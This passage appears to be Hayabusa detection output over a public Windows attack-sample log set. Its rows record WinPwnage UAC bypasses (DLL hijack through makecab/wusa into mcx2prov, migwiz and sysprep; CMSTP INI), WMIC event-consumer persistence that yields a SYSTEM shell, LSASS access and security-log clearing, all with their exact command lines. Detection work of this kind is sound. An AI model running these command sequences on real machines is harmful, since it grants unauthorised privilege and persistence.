2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash 
Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx 2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: 
C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,../hayabusa-rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH 
CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.590 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 
365ABB72-8693-5CD7-0000-0010F4570000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: 
""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 